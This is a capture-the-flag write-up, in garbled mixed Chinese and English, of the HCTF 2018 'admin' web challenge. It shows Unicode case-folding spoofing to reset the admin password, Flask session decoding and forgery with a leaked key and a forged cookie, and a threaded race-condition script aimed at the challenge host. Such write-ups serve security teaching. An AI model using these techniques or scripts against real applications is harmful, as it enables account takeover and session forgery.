• unicode欺骗

0x01 信息收集

The most important thing to get a website is, of course, to collect information,The information gathered determines the direction of penetration.
I have collected the following information on this website：

• Existing pages havelogin register posts(404) index change(修改密码)
• 在changeThe source code address of the website found in the source code of the page is as follows

0x02 unicode欺骗

Download the source code for code auditing,首先对routes.pyThe audit is performed as follows

It is found that the registration and login and password modification are only lowercase of the data,And strangely the lowercase function is not usedpython自带的,而是自己封装的,Intuition tells me that there is a problem here.
So let's see how this function is encapsulated 如下

nodeprep.prepareThis method converts uppercase letters to lowercase letters,但是它存在一个问题：
它会将unicode编码的ᴬ转化成A

unicode参考表：Search - Unicode Character Table

We know through code auditinglogin register changeused everywherestrlower()函数,都会使用到nodeprep.prepare函数.
Now let's clear our minds,我们只要获得adminThe user's login permission is sufficient,login register changeAll three are usedstrlower()函数,
Maybe we can get throughnodeprep.prepareThis feature of the function to achieve the changeadmin用户的密码,So how do we do it？
First we can register oneᴬdmin用户,After the registration is successful, the account saved in the backend is actually Admin,Then we are changing the password,因为strlower()Uppercase letters can be lowercase,So what we changed isadmin的密码

min--->Admin--->adminᴬd

Next let's register one firstᴬdmin账号

log in to this account

主页面如下,You can see that the displayed account is Admin

Next we change the password,把密码修改为test

可以看到修改成功

登录admin用户后,看到如下

0x03 flask session 伪造

看到源代码,可以知道这个web使用的flask框架写的,flask存在一个session伪造漏洞.

flask的session保存在客户端,Generally, only a signature is added to prevent interception and modification,But without encryption we can be rightsessionDecode to get the user data in it. If we are getting the signature key,It can be faked according to the decoded data,Regenerate the signaturesessionto deceive the server. flask的session使用base64对bytestype of user data to encode,And there may be compression before encoding(session以 "." At the beginning it indicates that compression was performed) flask 保存在cookie里面的session一般格式为 data.timestamp.signature ## 客户端session安全学习：https://www.leavesongs.com/PENETRATION/client-session-security.html#

We can know through code auditing,没有对session进行加密,而且在config.pygot the signing key

这说明我们可以进行session伪造,But how to get itflag那,In the process of code auditindex.html中还发现

只要在indexLet in the interfacesession['name']的值为admin就可以获得flag.
我们先获取index界面的session

.eJxFkEGPgjAQhf_KZs4cAOPFxIOkSCSZIUsKTXsx6iKlUjcBjFrjf99qNruHucyb-ebNe8D2ODSjhsU0XJoAtt0XLB7wsYcFEEuviq3miq_uZOVM8tQpVlsZvyo_kd1ElFURsV4j3zjKSiNNGpGjk7R5j6LuJU-04klPTJkiUwbZIca47pBX84LjrWBkUXiOKI0yuve7WprVjeznrOBl5z3cMVvrQpQWXemZaYgu0cQT42-HiuPVzy7hGcBhHI7b6fvUnP9ekELOpVgb4q1Dl3do2kiJ1KGRM48OyVAvba0pzi29elzG1C7fuM7u2uY_jJo21a9y3lkvwNSMEwRwGZvhHRtEITx_AFRzbBo.X0c0OQ.4qb0LysG2sqb3NHTApcnuwpAULw

Then we use as followspythonThe script decodes him：

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
    return session_json_serializer.loads(payload)
if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

{'_fresh': True, '_id': b'410d09e026f7a13d5fcefcbd6b54e549a1234dcb1573dbbe1eea0ae0e46c8fc0763eb15993183f1b55dcf8e73ab016d794b4120aa9df34e1a430a50c4e4e306d', 'csrf_token': b'af9aac58332b285ea326741463ebea7bf6675666', 'image': b'5SHR', 'name': 'test', 'user_id': '10'}

in the data that will be obtainedtest替换成admin,Then re-sign(The script address to use：https://github.com/noraj/flask-session-cookie-manager)

.eJxFkEGLwkAMhf_KkrOHtuJF8GCZWiwkZcvYIXMRV2unY8eFqqgj_vcdZdk95JKXfHl5D1jvh-ZkYHoeLs0I1t0Opg_4-IIpkMiuWswnWs7v5HjMMvNa1I6TVxUHcsuY8lVMojcol57yyrLNYvJ0YFf0qOqeZWq0THsS2pa5tii2CSZ1h3I1KSXeSkEOVeCoympr-rBr2M5v5D7Hpay64OGO-cKUqnLoq8DMIvSpIZnacDvSEq9hdgbPEWxPw359_j40x78XWPGE1cKSbD36okPbxlplHi2PAzoiSz272lBSOHr1JCfUzt64zm3a5j-MmparX-W4cUGAzc51RxjB5dQM79wgjuD5A8BwbGM.X0c24g.yUFbBmBBsRINcJJ0r0SvkWfPh4A

替换session,Get after refresh

0x04 条件竞争

Change the password just fromsession里面取namevalue can be modified,如果让这个name值为adminmodification can be achievedadmineffect of the account.
When logging in to the user, the user name is directly assigned without verificationsession的name,So when we log in while changing the passwordadmin用户,Theoretically, it is possible to modify itadmin账户的.
可以通过pythonWrite a two-threaded script,A thread logs in to the test account to change the password,A thread logs out of the test account loginadmin(Login here refers to just the usernameadmin密码不正确)
 

import requests
import threading

def login(s, username, password):
    data = {
        'username': username,
        'password': password,
        'submit': ''
    }
    return s.post("http://admin.2018.hctf.io/login", data=data)

def logout(s):
    return s.get("http://admin.2018.hctf.io/logout")

def change(s, newpassword):
    data = {
        'newpassword':newpassword
    }
    return s.post("http://admin.2018.hctf.io/change", data=data)

def func1(s):
    login(s, 'skysec', 'skysec')
    change(s, 'skysec')

def func2(s):
    logout(s)
    res = login(s, 'admin', 'skysec')
    if '<a href="/index">/index</a>' in res.text:
        print('finish')

def main():
    for i in range(1000):
        print(i)
        s = requests.Session()
        t1 = threading.Thread(target=func1, args=(s,))
        t2 = threading.Thread(target=func2, args=(s,))
        t1.start()
        t2.start()

if __name__ == "__main__":
    main()